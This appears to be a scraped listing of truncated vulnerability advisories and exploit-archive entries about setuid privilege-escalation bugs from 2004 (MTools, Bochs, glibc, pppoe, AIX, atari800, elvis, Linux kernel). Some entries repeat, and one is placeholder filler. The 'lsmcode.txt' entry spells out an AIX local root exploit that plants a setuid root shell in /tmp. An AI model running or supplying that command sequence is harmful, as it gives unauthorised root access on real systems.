CVE-2004-2303

MTools Mformat before 3.9.9, when installed setuid root, creates files with world-readable and world-writable permissions, which allows local users to read and overwrite files...

CVE-2004-2372

Buffer overflow in Bochs before 2.1.1, if installed setuid, allows local users to execute arbitrary code via a long HOME environment variable, which is used if the .bochsrc, bochsrc, and bochsrc.txt cannot be found in a known path. NOTE: some external documents recommend that Bochs be installed...

DEBIAN-CVE-2004-1453

GNU glibc 2.3.4 before 2.3.4.20040619, 2.3.3 before 2.3.3.20040420, and 2.3.2 before 2.3.2-r10 does not restrict the use of LDDEBUG for a setuid program, which allows local users to gain sensitive information, such as the list of symbols used by the program...

lsmcode.txt

mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat /tmp/aap/bin/Dctrl EOF !/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh...

CVE-2004-0564

Roaring Penguin pppoe rp-ppoe, if installed or configured to run setuid root contrary to its design, allows local users to overwrite arbitrary files. NOTE: the developer has publicly disputed the claim that this is a vulnerability because pppoe "is NOT designed to run setuid-root." Therefore this...

CVE-2004-0564

Roaring Penguin pppoe rp-ppoe, if installed or configured to run setuid root contrary to its design, allows local users to overwrite arbitrary files. NOTE: the developer has publicly disputed the claim that this is a vulnerability because pppoe "is NOT designed to run setuid-root." Therefore this...

DEBIAN-CVE-2004-0564

Roaring Penguin pppoe rp-ppoe, if installed or configured to run setuid root contrary to its design, allows local users to overwrite arbitrary files. NOTE: the developer has publicly disputed the claim that this is a vulnerability because pppoe "is NOT designed to run setuid-root." Therefore this...

CVE-2004-0564

Roaring Penguin pppoe rp-ppoe, if installed or configured to run setuid root contrary to its design, allows local users to overwrite arbitrary files. NOTE: the developer has publicly disputed the claim that this is a vulnerability because pppoe "is NOT designed to run setuid-root." Therefore this...

CVE-2004-1263

changepassword.cgi in ChangePassword 0.8, when installed setuid, allows local users to execute arbitrary code by modifying the PATH environment variable to point to a malicious "make" program...

AIX 5.1/5.2/5.3 local root exploits

hi, i found some local security holes in IBM's AIX versions 5.1, 5.2 and 5.3 unix for IBM RS/6000 powerpc. 1 the first is a bug in all setuid diag related tools that use an environment variable as a prefix to an external binary executed as root. 2 the second is a classical stack overflow in a too...

USN-39-1: Linux amd64 kernel vulnerability

USN-30-1 fixed several flaws in the Linux ELF binary loader's handling of setuid binaries. Unfortunately it was found that these patches were not sufficient to prevent all possible attacks on 64-bit platforms, so previous amd64 kernel images were still vulnerable to root privilege escalation if...

CVE-2004-1070

Technical details (affected kernel versions, vulnerable component, impact, or remediation) are not publicly available in the provided documents. Monitor for updates.

CVE-2004-1070

The loadelfbinary function in the binfmtelf loader binfmtelf.c in Linux kernel 2.4.x up to 2.4.27, and 2.6.x up to 2.6.8, does not properly check return values from calls to the kernelread function, which may allow local users to modify sensitive memory in a setuid program and execute arbitrary...

atari800 - Local Privilege Escalation

atari800 - Local Privilege Escalation / Exploit for atari800 by pi3 pi3ki31ny pi3@pi3:$ ./p ...::: -= exploit for Atari800 by pi3 pi3ki31ny =- :::... Ussage: + ./p options -? -v choose a bug: 1 - first bug in all versions Atari800 2 - second bug in older Atari800 - modiy argv0 3 - third bug in...

atari800 Local Root Exploit

Exploit for linux platform in category local exploits =========================== atari800 Local Root Exploit =========================== / Exploit for atari800 by pi3 pi3ki31ny email protected:$ ./p ...::: -= exploit for Atari800 by pi3 pi3ki31ny =- :::... Ussage: + ./p options -? -v choose a bu...

atari800 - Local Privilege Escalation

/ Exploit for atari800 by pi3 pi3ki31ny pi3@pi3:$ ./p ...::: -= exploit for Atari800 by pi3 pi3ki31ny =- :::... Ussage: + ./p options -? -v choose a bug: 1 - first bug in all versions Atari800 2 - second bug in older Atari800 - modiy argv0 3 - third bug in config file - OS/AROM 4 - fourth bug in...

atari800 Local Root Exploit

No description provided by source. / Exploit for atari800 by pi3 pi3ki31ny pi3@pi3:$ ./p ...::: -= exploit for Atari800 by pi3 pi3ki31ny =- :::... Ussage: + ./p options -? this help screen -v choose a bug: 1 - first bug in all versions Atari800 2 - second bug in older Atari800 - modiy argv0 3 -...

helvis -- arbitrary file deletion problem

The setuid root elvprsv utility, used to preserve recovery helvis files, can be abused by local users to delete with root privileges. The problem is that elvprsv deletes files when it thinks they have become corrupt. When elvprsv is pointed to a normal file then it will almost always think the fi...

helvis -- information leak vulnerabilities

Once a recovery file has been preserved by the setuid root elvprsv utility it is placed in a worldreadable directory with worldreadable permissions. This possibly allows sensitive information to leak. In addition to this information leak, it is possible for users to recover files that belong to...

USN-30-1: Linux kernel vulnerabilities

CAN-2004-0883, CAN-2004-0949: During an audit of the smb file system implementation within Linux, several vulnerabilities were discovered ranging from out of bounds read accesses to kernel level buffer overflows. To exploit any of these vulnerabilities, an attacker needs control over the answers ...